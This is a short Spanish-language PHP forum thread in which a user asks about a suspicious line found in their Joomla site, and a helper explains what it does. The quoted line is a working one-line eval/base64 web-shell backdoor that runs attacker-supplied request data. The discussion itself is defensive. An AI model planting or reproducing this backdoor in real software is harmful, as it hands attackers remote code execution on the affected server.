Foros del Web » Programando para Internet » PHP »

virus php ? jomla

Estas en el tema de virus php ? jomla en el foro de PHP en Foros del Web. hola bueno , queria hacerles una consulta, sobre los virus en php.... no se hast que punto puede haber archivos , codigo php, malos... tal ...
  #1 (permalink)  
Antiguo 04/05/2013, 00:52
 
Fecha de Ingreso: febrero-2013
Ubicación: en mi casa
Mensajes: 541
Antigüedad: 11 años, 1 mes
Puntos: 3
virus php ? jomla

hola bueno , queria hacerles una consulta,
sobre los virus en php....
no se hast que punto puede haber archivos , codigo php, malos...
tal vez cuando se usan funciones de "bajo nivel"

bueno que es esto??


defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment'])));


tenia mi codigo que no andaba, lo comente y ahora funciona? busque en google y dice algo de un troyano, lo conocen,, o lei mal yo ...
  #2 (permalink)  
Antiguo 04/05/2013, 08:42
Avatar de Nemutagk
Colaborador
 
Fecha de Ingreso: marzo-2004
Ubicación: México
Mensajes: 2.633
Antigüedad: 20 años
Puntos: 406
Respuesta: virus php ? jomla

La función defined() comprueba si existe la constante indicada devolviendo true/false según el caso, al agregarle el "or", al devolver false (defined()) se ejecuta el die() por lo cual el código que este después de dicha linea jamás se ejecutará, el problema real es el código siguiente, ya que toma una variable con REQUEST el cual puede tomar la variable de GET, POST o COOKIE con una sola linea, peor aun, el valor devuelto lo pasa por eval() lo cual hace que PHP analice el contenido y lo trate de ejecutar como código PHP, esto es basicamente para inyectar código malicioso en tu sitio con solo pasarle un parametro...
__________________
Listo?, tendría que tener 60 puntos menos de IQ para considerarme listo!!!
-- Sheldon Cooper
http://twitter.com/nemutagk
PD: No contestaré temas vía mensaje personal =)
  #3 (permalink)  
Antiguo 05/05/2013, 20:06
 
Fecha de Ingreso: febrero-2013
Ubicación: en mi casa
Mensajes: 541
Antigüedad: 11 años, 1 mes
Puntos: 3
Respuesta: virus php ? jomla

excelente,

Etiquetas: virus
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 15:31.